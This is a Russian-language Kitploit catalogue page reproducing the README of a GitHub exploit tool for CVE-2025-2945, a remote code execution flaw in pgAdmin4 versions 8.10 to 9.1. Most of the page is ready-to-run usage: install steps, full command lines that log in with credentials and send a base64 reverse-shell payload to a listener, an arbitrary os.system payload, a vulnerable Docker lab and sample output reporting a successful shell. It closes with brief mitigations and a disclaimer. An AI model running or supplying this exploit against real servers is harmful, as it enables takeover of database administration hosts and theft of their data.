Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-2945 — Эксплойт для уязвимости удалённого выполнения кода (RCE) в pgAdmin4, затрагивающей версии с 8.10 по 9.1. | Kitploit
Инструменты/GitHubGitHub/g0d150ne/cve-2025-2945
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubg0d150ne/cve-2025-2945

CVE-2025-2945

Эксплойт для уязвимости удалённого выполнения кода (RCE) в pgAdmin4, затрагивающей версии с 8.10 по 9.1.

Репозиторий
51 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-2945 - Эксплойт аутентифицированного RCE в pgAdmin4

Автор: G0D150NE Версия: 2.0.0
CVE: CVE-2025-2945
Критичность: Критическая (CVSS 9.9)

📌 Описание

Эксплойт для уязвимости удаленного выполнения кода (RCE) в pgAdmin4, затрагивающей версии с 8.10 по 9.1.

Уязвимость существует в конечной точке /sqleditor/query_tool/download, где параметр query_commited передается без санитизации в функцию eval() Python, что позволяет выполнять произвольный код.

⚡ Возможности

  • ✅ Автоматическое определение версии
  • ✅ Сбор CSRF-токена из нескольких источников
  • ✅ Перебор идентификаторов сервера/группы
  • ✅ Полезная нагрузка reverse shell (закодированная в base64)
  • ✅ Поддержка пользовательских полезных нагрузок
  • ✅ Подробный режим отладки
  • ✅ Цветной вывод в консоль
  • ✅ Обход проверки SSL

🚀 Установка

root@kitploit:~
# Clone or download the script
git clone https://github.com/g0d150ne/CVE-2025-2945
cd CVE-2025-2945

# Install dependencies
pip install requests

🎯 Использование

Базовое использование

root@kitploit:~
python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444

С подробным выводом

root@kitploit:~
python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444 \
  -v

Пользовательская полезная нагрузка

root@kitploit:~
python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444 \
  --custom-payload "__import__('os').system('whoami > /tmp/test.txt')"

Пропустить проверку версии

root@kitploit:~
python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444 \
  --skip-version-check

📊 Аргументы

Аргумент Обязательный Описание --target-url Да Базовый URL pgAdmin4 (http://RHOST:PORT/) --username Да Email для входа в pgAdmin4 --password Да Пароль для входа в pgAdmin4 --db-user Да Имя пользователя базы данных --db-pass Да Пароль базы данных --db-name Да Имя базы данных --Rhost Да IP-адрес слушателя для reverse shell --Rport Да Порт слушателя для reverse shell --max-server-id Нет Максимальный ID сервера для сканирования (по умолчанию: 10) --skip-version-check Нет Пропустить проверку версии --custom-payload Нет Пользовательская полезная нагрузка Python --verbose, -v Нет Включить вывод отладочной информации --no-banner Нет Скрыть баннер

📋 Требования

· Python 3.6+ · библиотека requests

root@kitploit:~
pip install requests

🧪 Тестовая среда

root@kitploit:~
# Docker pgAdmin vulnerable version
docker run -d -p 5050:5050 \
  -e [email protected] \
  -e PGADMIN_DEFAULT_PASSWORD=admin123 \
  dpage/pgadmin4:8.10

# Then run the exploit
python3 poc.py \
  --target-url http://localhost:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444

🖥️ Пример вывода

root@kitploit:~
   ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄ 
  ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
  ▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ 
  ▐░▌          ▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌          
  ▐░█▄▄▄▄▄▄▄▄▄ ▐░█▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌          
  ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌▐░▌          
   ▀▀▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌       ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌▐░▌          
            ▐░▌▐░▌       ▐░▌▐░▌       ▐░▌          ▐░▌▐░▌          
   ▄▄▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░█▄▄▄▄▄▄▄█░▌ ▄▄▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ 
  ▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
   ▀▀▀▀▀▀▀▀▀▀▀  ▀         ▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀ 
   
   CVE-2025-2945 - pgAdmin4 Authenticated RCE
   Author: G0D150NE
   Version: 2.0.0

[*] Target running vulnerable version 8.10
[*] Authenticating as [email protected]...
[+] Authentication successful
[*] Scanning for valid server (SGID: 7, max: 10)...
[+] Found valid server (SGID: 7, SID: 1)
[*] Initializing SQL editor (trans_id: 4827193)...
[+] SQL editor initialized
[*] Reverse shell payload to 10.10.14.7:4444
[*] Sending payload...
[+] Payload delivered (HTTP 500)
[*] Check listener at your endpoint
[+] Exploit successful!
[*] Check reverse shell on 10.10.14.7:4444

🛡️ Меры защиты

· Обновите pgAdmin4 до версии 9.2 или выше · Ограничьте доступ к интерфейсу pgAdmin · Используйте надежные учетные данные · Включите MFA, если доступно

⚠️ Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Использование против систем без явного разрешения незаконно. Автор не несет ответственности за любое неправомерное использование.

🔗 Ссылки

· CVE-2025-2945 · Консультация по безопасности pgAdmin

📄 Лицензия

Лицензия MIT

Скачать инструмент